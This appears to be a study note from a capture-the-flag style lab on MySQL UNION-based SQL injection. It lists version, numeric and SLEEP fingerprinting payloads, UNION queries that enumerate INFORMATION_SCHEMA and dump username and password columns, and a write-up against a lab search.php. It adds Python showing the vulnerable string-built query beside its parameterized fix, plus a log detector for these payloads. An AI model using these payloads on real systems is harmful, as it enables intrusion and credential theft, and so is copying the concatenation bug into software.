# Database Enumeration

## Payloads

| Payload            | When to Use                      | Expected Output                                         | Wrong Output                                                  |
| ------------------ | -------------------------------- | ------------------------------------------------------- | ------------------------------------------------------------- |
| `SELECT @@version` | When we have full query output   | MySQL version, e.g. `10.3.22-MariaDB-1ubuntu1`          | In MSSQL it returns the MSSQL version; error with other DBMSs. |
| `SELECT POW(1,1)`  | When we only have numeric output | `1`                                                     | Error with other DBMSs                                        |
| `SELECT SLEEP(5)`  | Blind / no output                | Delays the page response for 5 seconds and returns `0`. | Will not delay the response with other DBMSs                  |

## Schemata

### UNION

```sql
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
```

```sql
cn' UNION select 1,database(),2,3-- -
```

### TABLES

```sql
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
```

> Note: we added a `where table_schema='dev'` condition to only return tables from the 'dev' database; otherwise we would get all tables in all databases, which can be many.

> Note how we replaced the numbers '2' and '3' with `TABLE_NAME` and `TABLE_SCHEMA` to get the output of both columns in the same query.

### COLUMNS

```sql
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
```

### Data

```sql
cn' UNION select 1, username, password, 4 from dev.credentials-- -
```

> Remember: don't forget to use the dot operator to refer to the 'credentials' table in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed.


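The Data payload above only works because the search parameter is pasted into the SQL text. The following Python snippet is an added example, not code from the HTB module or from this page's author: it shows that concatenation pattern next to its parameterized fix, running the same `cn' UNION ...-- -` input through both. SQLite in memory stands in for MySQL so it runs offline; the `ports` and `credentials` tables and their rows are constructed, and `main.credentials` uses SQLite's default schema name the way `dev.credentials` qualifies the table on the page.

```python
"""Added example (not the page's or HTB's code): the string-concatenation bug
behind a search feature like search.php, next to its parameterized fix.
SQLite in memory stands in for MySQL; all tables and rows are constructed."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed schema: the 'ports' table the search reads, and a
    'credentials' table the search should never be able to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE ports (id INTEGER, code TEXT, city TEXT, volume INTEGER);
        INSERT INTO ports VALUES (1, 'cn', 'Shanghai', 400), (2, 'nl', 'Rotterdam', 150);
        CREATE TABLE credentials (id INTEGER, username TEXT, password TEXT, role TEXT);
        INSERT INTO credentials VALUES (1, 'admin', 'constructed-hash-1', 'admin');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, port_code: str) -> list:
    """Vulnerable form: the parameter is pasted into the SQL text, so a quote,
    a UNION and a trailing comment in the input all become part of the query."""
    sql = f"SELECT id, code, city, volume FROM ports WHERE code = '{port_code}'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, port_code: str) -> list:
    """Hardened form: the driver binds the value, so the entire input is
    compared as one string against the code column and never parsed as SQL."""
    sql = "SELECT id, code, city, volume FROM ports WHERE code = ?"
    return conn.execute(sql, (port_code,)).fetchall()


# The page's Data payload; 'main.credentials' uses SQLite's default schema name
# the same way 'dev.credentials' qualifies the table on the page.
UNION_PAYLOAD = "cn' UNION select 1, username, password, 4 from main.credentials-- -"


def compare(payload: str = UNION_PAYLOAD) -> tuple:
    """Run the same input through both forms and return (vulnerable, hardened) rows."""
    conn = build_db()
    try:
        return search_vulnerable(conn, payload), search_parameterized(conn, payload)
    finally:
        conn.close()


if __name__ == "__main__":
    leaked, safe = compare()
    print("string-built query returned:", leaked)  # the 'cn' port row plus a credentials row
    print("parameterized query returned:", safe)   # []
```

With the string-built query the result set gains a row from `credentials`, which is exactly what the screenshots on this page show; with the bound parameter the whole payload is compared as a literal port code and matches nothing. The fix is the binding, not any quoting or filtering of the input.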
## WriteUp

```
http://83.136.252.13:54651/search.php?port_code=   ##Send an empty search first
cn' union select 1,2,3,4-- -                        ##UNION select with four columns
```

```sql
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - ##View all existing databases
cn' UNION select 1,database(),2,3-- - ##View the database currently in use
```


> This shows the database you are using

> Note: in the example above we added a `where table_schema='dev'` condition to only return tables from the 'dev' database; otherwise we get all tables in all databases, which can be many.

```sql
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES-- - ##View all tables; with no table_schema filter this lists tables from every database
```

```sql
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- - ##View the columns of the users table
```

```sql
cn' UNION select 1, username, password, 4 from ilfreight.users-- - ##Dump the username and password columns of the users table in the ilfreight database
```


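Every request in the write-up above goes through `search.php?port_code=`, so the same payloads are visible in the web server's access log. As an added detection-side example (not part of this page or the HTB module), the following Python snippet flags the payload families used here: the `@@version`, `POW(1,1)` and `SLEEP(5)` fingerprinting probes from the Payloads table and the `UNION select ... from INFORMATION_SCHEMA...` enumeration queries from the write-up. It assumes Apache/nginx combined log format; the log lines, client addresses and timestamps are constructed for the example, and only the `/search.php?port_code=` path is taken from the write-up.

```python
"""Added example: flag the SQLi probe families from this page in access logs.
Log format assumed: Apache/nginx combined. Sample lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One rule per payload family on the page; patterns run against the
# URL-decoded, whitespace-collapsed, lower-cased parameter value.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)"),
    "numeric_probe": re.compile(r"\bpow\s*\(\s*1\s*,\s*1\s*\)"),
    "time_probe": re.compile(r"\bsleep\s*\(\s*\d+\s*\)"),
    "comment_tail": re.compile(r"--\s|#|/\*"),  # weak on its own, see scan_target
}

# Combined log format (assumed); only the client ip and request target are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines: a benign search, the probes from the page, another benign search.
SAMPLE_LOG = [
    '10.10.14.5 - - [02/Mar/2024:10:01:12 +0000] "GET /search.php?port_code=cn HTTP/1.1" 200 1832',
    '10.10.14.5 - - [02/Mar/2024:10:01:40 +0000] "GET /search.php?port_code=cn%27+union+select+1%2C2%2C3%2C4--+- HTTP/1.1" 200 1940',
    '10.10.14.5 - - [02/Mar/2024:10:02:03 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2Cschema_name%2C3%2C4+from+INFORMATION_SCHEMA.SCHEMATA--+- HTTP/1.1" 200 2210',
    '10.10.14.5 - - [02/Mar/2024:10:02:30 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2C%40%40version%2C3%2C4--+- HTTP/1.1" 200 1988',
    '10.10.14.5 - - [02/Mar/2024:10:03:11 +0000] "GET /search.php?port_code=cn%27+UNION+select+1%2CSLEEP%285%29%2C3%2C4--+- HTTP/1.1" 200 1832',
    '10.10.14.9 - - [02/Mar/2024:10:04:00 +0000] "GET /search.php?port_code=nl HTTP/1.1" 200 1801',
]


def normalize(value: str) -> str:
    """parse_qsl already decoded once; decode again to catch double-encoding,
    then collapse whitespace and lower-case so the regexes stay simple."""
    return re.sub(r"\s+", " ", unquote_plus(value)).lower()


def scan_target(target: str) -> dict:
    """Return {param: [matched rules]} for a request target such as
    '/search.php?port_code=...'. A comment tail alone is not reported, since
    '--' and '#' show up in legitimate input far too often."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        norm = normalize(value)
        matched = [rule for rule, pat in RULES.items() if pat.search(norm)]
        if matched and matched != ["comment_tail"]:
            hits[name] = matched
    return hits


def scan_log(lines) -> list:
    """Return (ip, path, hits) for every request that carries a probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = scan_target(m.group("target"))
        if hits:
            findings.append((m.group("ip"), urlsplit(m.group("target")).path, hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {hits}")
```

Run against the sample, the two plain searches pass and the four probe requests are reported with the rule names that fired, so the `INFORMATION_SCHEMA` step and the `@@version` and `SLEEP()` probes stand out from ordinary traffic. Decoding twice matters because the page's payloads arrive percent-encoded and a client can encode them again; gating on something stronger than a bare comment keeps `--` in normal search strings from paging anyone.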